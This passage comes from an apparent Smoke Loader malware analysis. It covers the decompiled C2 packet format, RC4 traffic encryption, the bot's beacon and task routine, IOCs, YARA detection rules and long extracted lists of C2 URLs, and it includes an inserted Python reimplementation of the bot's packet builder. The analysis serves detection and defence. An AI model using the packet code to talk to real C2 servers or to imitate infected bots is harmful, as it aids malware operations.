= command_id;              // offset 52\r\n*(_DWORD *)(packet + 54) = some_flag;              // offset 54: arg_1\r\n*(_DWORD *)(packet + 58) = some_flag_1;            // offset 58: arg_2\r\nif ( additional_data )\r\nlstrcatA(packet + 62, additional_data);            // offset 62\r\nv10 = connect_and_send((int)c2_url, (int)packet, \u0026packet_length, 1, 1);\r\n*a6 = packet_length;\r\nheap_free(packet);\r\nreturn v10;\r\n}\r\nDecompiled function used to pack and send command 
packets\r\nWhich can be represented as a C structure (offsets taken from the decompilation above):\r\nstruct command_packet {\r\n    WORD  magic;             // 0x00: 2018\r\n    BYTE  bot_id[41];        // 0x02: NUL-terminated, up to 40 characters\r\n    BYTE  sample_id[6];      // 0x2B: NUL-terminated\r\n    BYTE  a;                 // 0x31: hardcoded 0x61 'a'\r\n    BYTE  flag_1;            // 0x32: 0 in this sample\r\n    BYTE  flag_2;            // 0x33: 0 in this sample\r\n    WORD  cmd_id;            // 0x34\r\n    DWORD arg_1;             // 0x36\r\n    DWORD arg_2;             // 0x3A\r\n    BYTE  additional_data[]; // 0x3E: optional NUL-terminated string\r\n};\r\nA struct representing the layout of the command packet; packet_length is 63 (62 header bytes plus a NUL) plus the length of additional_data\r\nPacket encryption is done using RC4 yet again. It’s worth noting, however, that different keys are used for encrypting the outbound packets and decrypting the inbound ones:\r\nA part of decompiled function responsible for encrypting packets before sending them to the C2\r\nA part of decompiled function responsible for decrypting packets before parsing them\r\nProgram routine\r\nThe binary starts by building a User-Agent for the installed IE version, which it obtains by querying the registry key Software\\Microsoft\\Internet Explorer and its values svcVersion and Version. The obtained User-Agent is used in later HTTP requests.\r\nNext, it tries to connect continuously to http://www.msftncsi.com/ncsi.txt until it gets a response; this way it makes sure that the machine is connected to the internet.\r\nFinally, Smoke Loader begins its communication routine by sending a 10001 packet to the C\u0026C. 
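The exchange just described and the send_command layout from the Packet structure section, as an added Python example (not code from the article or from Smoke Loader): it lays a packet out byte for byte as send_command does, parses it back, and wraps it in RC4 with separate outbound and inbound keys. The keys, the bot id, the sample id, the command names and the reply bytes are constructed placeholders, since the real keys exist only in the binary and the reply format is not described here; the rc4 routine is the textbook one, which is also what decrypts the layer II import names and the layer IV strings.

```python
import struct

MAGIC = 2018             # WORD at offset 0, written by send_command
HEADER_LEN = 62          # additional_data starts here; the sent length is 63 + len(data)
CMD_NAMES = {10001: 'beacon', 10002: 'get_task', 10003: 'task_result'}  # names chosen here, not from the bot


def rc4(key, data):
    '''Textbook RC4 (KSA + PRGA). Smoke Loader uses plain RC4 for the layer II
    import names, the layer IV strings and the C2 traffic, with a different key
    for each direction of the C2 channel.'''
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def build_command_packet(bot_id, sample_id, cmd_id, arg1=0, arg2=0, extra=b''):
    '''Lay the packet out byte for byte as the decompiled send_command does.
    bot_id and sample_id are lstrcatA-ed into a zeroed buffer at offsets 2 and 43,
    so they must leave room for their NUL terminator.'''
    if len(bot_id) > 40 or len(sample_id) > 5:
        raise ValueError('bot_id/sample_id too long for the fixed header')
    pkt = bytearray(HEADER_LEN + len(extra) + 1)      # allocWrapper(length + 1), zero-filled
    struct.pack_into('<H', pkt, 0, MAGIC)
    pkt[2:2 + len(bot_id)] = bot_id.encode()
    pkt[43:43 + len(sample_id)] = sample_id.encode()
    pkt[49] = ord('a')                                  # hardcoded 'a'
    pkt[50] = 0                                         # the two flag bytes, 0 in this sample
    pkt[51] = 0
    struct.pack_into('<HII', pkt, 52, cmd_id, arg1, arg2)
    pkt[HEADER_LEN:HEADER_LEN + len(extra)] = extra     # lstrcatA(packet + 62, additional_data)
    return bytes(pkt)                                   # 63 + len(extra) bytes, trailing NUL included


def parse_command_packet(pkt):
    '''Inverse of build_command_packet. Refusing a wrong magic keeps a traffic
    decoder from mis-parsing arbitrary POST bodies as bot packets.'''
    if len(pkt) < HEADER_LEN + 1 or struct.unpack_from('<H', pkt, 0)[0] != MAGIC:
        raise ValueError('not a Smoke Loader command packet')
    nul = bytes(1)
    cmd_id, arg1, arg2 = struct.unpack_from('<HII', pkt, 52)
    return {
        'bot_id': pkt[2:43].split(nul)[0].decode(),
        'sample_id': pkt[43:49].split(nul)[0].decode(),
        'cmd_id': cmd_id,
        'cmd_name': CMD_NAMES.get(cmd_id, 'unknown'),
        'arg1': arg1,
        'arg2': arg2,
        'extra': pkt[HEADER_LEN:].split(nul)[0],
    }


# Constructed placeholder keys: the real ones are only in the binary, not in the article.
OUTBOUND_KEY = bytes.fromhex('d1e2f3a4')   # assumption: request key
INBOUND_KEY = bytes.fromhex('0badcafe')    # assumption: response key, deliberately different


def demo_exchange(bot_id='0123456789abcdef0123456789abcdef01234567', sample_id='0504'):
    '''Beacon (10001), report task 7 as executed (10003) and decode a fake reply.
    The reply bytes are a constructed placeholder; the real reply format is not
    described in the article.'''
    beacon = build_command_packet(bot_id, sample_id, 10001)
    wire = rc4(OUTBOUND_KEY, beacon)                    # what goes into the POST body
    assert rc4(OUTBOUND_KEY, wire) == beacon            # RC4 is its own inverse
    report = build_command_packet(bot_id, sample_id, 10003, arg1=7, arg2=1)
    fake_reply = rc4(INBOUND_KEY, b'plugins=0;tasks=3')
    return parse_command_packet(beacon), parse_command_packet(report), rc4(INBOUND_KEY, fake_reply)
```

parse_command_packet checks the 2018 magic before touching any fixed offset, which is the check to keep in a decoder that sees whole POST bodies; the 63-byte minimum length comes from the terminating NUL that send_command counts into packet_length.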
The C\u0026C responds with a list of plugins to be installed and the number of tasks to be fetched.\r\nThe bot iterates over the task range and tries to get each task by sending a 10002 packet with the task number as an argument.\r\nThe task payload is often not hosted on the C\u0026C server itself; instead a Location header with the URL of the real binary is returned.\r\nUpon execution of the task, a 10003 packet is sent back with arg_1 equal to the task number and arg_2 equal to 1 if the task executed successfully.\r\nGraph representation of the communication between bot and C2\r\nGeneral IOCs\r\nProgram dumps itself to %APPDATA%\\Microsoft\\Windows\\[a-z]{8}\\[a-z]{8}.exe\r\nProgram creates a shortcut to itself in %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[a-z]{8}.lnk\r\nPerforms a System\\CurrentControlSet\\Services\\Disk\\Enum\\0 registry query\r\nGET requests to http://www.msftncsi.com/ncsi.txt\r\nPOST requests answered with HTTP 404 responses that nevertheless carry data in the body\r\nExample request and response:\r\nYara rule:\r\nrule smokeloader: trojan\r\n{\r\nmeta:\r\nauthor = \"psrok1\"\r\nstrings:\r\n$fetch_cnc_url1 = { 80 3d [4] ?? 76 ?? c6 05 [4] 01 3? ?? a0 [4] 8b }\r\n$fetch_cnc_url2 = { a1 [4] 83 f? ?? 75 ?? 3? ?? a3 [4] 5? 8b }\r\n$wsprintf_msg = { a1 [4] 5? a1 [4] 5? 68 [4] 68 [4] 68 [4] [5-12] ff 15 }\r\n$nofmt_msg = { 8? ?? b? ?? 07 00 00 66 89 ?? 68 [4] 8d ?? 02 5? }\r\n$rc4_key_req = { 6a 04 5? [1-4] ff 75 ?? c7 45 [5] e8 }\r\n$rc4_key_resp = { c7 45 [5] e8 [4] 5? ff 15 [4] 83 c? 
05 }\r\ncondition:\r\n2 of them or (1 of them and smokeloader_fmt)\r\n}\r\nrule smokeloader_2018: trojan {\r\nmeta:\r\nauthor = \"nazywam\"\r\nmodule = \"smokeloader\"\r\nstrings:\r\n$compose_packet = { E8 [4] 8B [1] B8 E2 07 00 00 68 [4] 8D }\r\n$load_cnc1 = { FF [5] 83 C4 30 8B CE E8 [4] 55 68 [4] FF [5] B9 [4] E8 }\r\n$load_cnc2 = { 8A [2] 88 [6] 84 DB 0F [5] B9 [4] E8 [4] 8B [5] 50 }\r\n$rc4_key_req = { 6A 1D 59 E8 [4] 80 [3] 00 00 00 01 8B [1] 8B [6] [11] 75 [1] 6A 04 55 8D }\r\n$rc4_key_resp = { 89 [3] 80 F9 3C 74 [1] 3B C8 7C [1] 3B C8 0F [5] 6A 04 51 8D [3] C7 }\r\ncondition:\r\nall of them\r\n}\r\nCollected IOCs\r\nMalware configs:\r\n[(u'smk_magic', 2015), (u'sample_id', u''), (u'domains', [{u'cnc': u''}, {u'cnc': u'http://makron.bit/'}, {u'cnc': u'http://makronwin.bit/'}, {u'cnc': u'http://makron.site/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u''), (u'domains', [{u'cnc': u'http://alrashoudi.com/wp/k/index.php'}, {u'cnc': u'http://psoeiras.net/js/k/index.php'}, {u'cnc': u'http://twinrealty.com/vworker/k/index.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'00004'), (u'domains', [{u'cnc': u'http://springhate.at/xptu/'}, {u'cnc': u'http://springback.at/xptu/'}, {u'cnc': u'http://springbaha.at/xptu/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0002'), (u'domains', [{u'cnc': u'http://cabrioboss.com/'}, {u'cnc': u'http://zeronightmare.com/'}, {u'cnc': u'http://valakasdragon.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0103'), (u'domains', [{u'cnc': u'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc': u'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc': u'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc': u'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, 
{u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nu'http://businessnames43.4irc.com/'}, {u'cnc': u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': 
u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, {u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, {u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, 
{u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0115'), (u'domains', [{u'cnc':\r\nu'http://alrashoudi.com/wp/k/index.php'}, {u'cnc': u'http://psoeiras.net/js/k/index.php'}, {u'cnc':\r\nu'http://twinrealty.com/vworker/k/index.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0504'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': 
u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nu'http://businessnames43.4irc.com/'}, {u'cnc': u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, {u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, {u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, {u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0602'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, 
{u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nu'http://businessnames43.4irc.com/'}, {u'cnc': 
u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, {u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, 
{u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, {u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0803'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, 
{u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nu'http://businessnames43.4irc.com/'}, {u'cnc': u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, 